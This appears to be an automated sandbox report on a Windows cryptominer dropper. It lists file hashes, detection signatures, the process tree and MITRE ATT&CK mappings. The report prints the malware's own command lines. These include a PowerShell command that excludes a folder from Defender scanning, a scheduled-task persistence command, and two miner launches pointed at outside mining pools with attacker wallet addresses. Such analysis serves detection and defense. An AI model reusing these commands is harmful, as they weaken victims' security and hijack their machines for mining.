b57943849425f3f3a4cc66192d47a1f15900c627f4bad7da4280ad72da553b8c

Analysis

max time kernel
99s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
02/01/2023, 19:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Build-5064047735-69594.exe
Size

793KB
MD5

be1c30feca41f897c83974288b591f9a
SHA1

82ca8fb9b994f8c99a6156e14057f4e5eab2a025
SHA256

b57943849425f3f3a4cc66192d47a1f15900c627f4bad7da4280ad72da553b8c
SHA512

4e6b87a008dc822c3671a258c92b9aef511a017137d5a6e7cf5db78d96eaec3e19643b69ee4249958b2fa0c4e2c1d0174dc659feb102cdfb5ad0ee41fc7a6557
SSDEEP

24576:hLAt3ieGOGoNOcfLtAz2QFPlePWBoy2Ij:te/VNLFIAPxdY

Score

9^/10

miner upx

Malware Config

Signatures

Detectes Phoenix Miner Payload 3 IoCs

miner

resource	yara_rule
behavioral2/memory/3908-163-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/3908-164-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/3908-165-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
552	mhnenpgoqiutiptl.exe
212	ghoul.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3908-158-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/3908-160-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/3908-161-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/3908-163-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/3908-164-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/3908-165-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	mhnenpgoqiutiptl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	ghoul.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3908	RegSvcs.exe
3908	RegSvcs.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 212 set thread context of 2580	212	ghoul.exe	96
PID 212 set thread context of 3908	212	ghoul.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4908	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5040	powershell.exe
5040	powershell.exe
212	ghoul.exe
212	ghoul.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	212	ghoul.exe
Token: SeDebugPrivilege	5040	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 872 wrote to memory of 552	872	Build-5064047735-69594.exe	80
PID 872 wrote to memory of 552	872	Build-5064047735-69594.exe	80
PID 872 wrote to memory of 552	872	Build-5064047735-69594.exe	80
PID 552 wrote to memory of 212	552	mhnenpgoqiutiptl.exe	83
PID 552 wrote to memory of 212	552	mhnenpgoqiutiptl.exe	83
PID 212 wrote to memory of 5040	212	ghoul.exe	84
PID 212 wrote to memory of 5040	212	ghoul.exe	84
PID 212 wrote to memory of 4920	212	ghoul.exe	90
PID 212 wrote to memory of 4920	212	ghoul.exe	90
PID 4920 wrote to memory of 4908	4920	cmd.exe	92
PID 4920 wrote to memory of 4908	4920	cmd.exe	92
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 212 wrote to memory of 2580	212	ghoul.exe	96
PID 2580 wrote to memory of 2332	2580	vbc.exe	97
PID 2580 wrote to memory of 2332	2580	vbc.exe	97
PID 212 wrote to memory of 3908	212	ghoul.exe	99
PID 212 wrote to memory of 3908	212	ghoul.exe	99
PID 212 wrote to memory of 3908	212	ghoul.exe	99
PID 212 wrote to memory of 3908	212	ghoul.exe	99
PID 212 wrote to memory of 3908	212	ghoul.exe	99
PID 212 wrote to memory of 3908	212	ghoul.exe	99
PID 212 wrote to memory of 3908	212	ghoul.exe	99

C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe
"C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:872
- C:\Users\Admin\AppData\Local\Temp\mhnenpgoqiutiptl.exe
  "mhnenpgoqiutiptl.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:552
- - C:\Users\Admin\AppData\Local\Temp\ghoul.exe
    "C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5040
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4920
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:4908
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RN9B8LkT5BcYXbc4ZVMYitfgKaA1wwbXwy.work -p x -t 3
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2332
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0x20caf9B2c7aB54C3cB949F1489DD697327131861.Rig001 -coin etc -log 0
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3908

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ghoul.exe

Filesize
899KB

MD5
813862d29c21094ebd1f95feb80771ff

SHA1
5e61691a9d791e798e19d99a27c9f9959d319e9b

SHA256
5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a

SHA512
97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

Download Submit
C:\Users\Admin\AppData\Local\Temp\ghoul.exe

Filesize
899KB

MD5
813862d29c21094ebd1f95feb80771ff

SHA1
5e61691a9d791e798e19d99a27c9f9959d319e9b

SHA256
5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a

SHA512
97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

Download Submit
C:\Users\Admin\AppData\Local\Temp\mhnenpgoqiutiptl.exe

Filesize
1.5MB

MD5
4c8d2d06487d07ec350aa5c5d699bb55

SHA1
adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d

SHA256
5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567

SHA512
37f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab

Download Submit
C:\Users\Admin\AppData\Local\Temp\mhnenpgoqiutiptl.exe

Filesize
1.5MB

MD5
4c8d2d06487d07ec350aa5c5d699bb55

SHA1
adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d

SHA256
5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567

SHA512
37f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab

Download Submit
memory/212-148-0x00007FFCFFB80000-0x00007FFD00641000-memory.dmp

Filesize
10.8MB

Download
memory/212-142-0x00000000006B0000-0x0000000000796000-memory.dmp

Filesize
920KB

Download
memory/212-162-0x00007FFCFFB80000-0x00007FFD00641000-memory.dmp

Filesize
10.8MB

Download
memory/212-143-0x00007FFCFFB80000-0x00007FFD00641000-memory.dmp

Filesize
10.8MB

Download
memory/552-137-0x0000000004ED0000-0x0000000004F62000-memory.dmp

Filesize
584KB

Download
memory/552-135-0x0000000000180000-0x000000000030C000-memory.dmp

Filesize
1.5MB

Download
memory/552-136-0x0000000005380000-0x0000000005924000-memory.dmp

Filesize
5.6MB

Download
memory/552-138-0x0000000004CE0000-0x0000000004CEA000-memory.dmp

Filesize
40KB

Download
memory/2580-153-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2580-157-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2580-156-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2580-154-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2580-151-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/3908-158-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/3908-160-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/3908-161-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/3908-163-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/3908-164-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/3908-165-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/5040-147-0x00007FFCFFB80000-0x00007FFD00641000-memory.dmp

Filesize
10.8MB

Download
memory/5040-146-0x00007FFCFFB80000-0x00007FFD00641000-memory.dmp

Filesize
10.8MB

Download
memory/5040-145-0x0000023CA41A0000-0x0000023CA41C2000-memory.dmp

Filesize
136KB

Download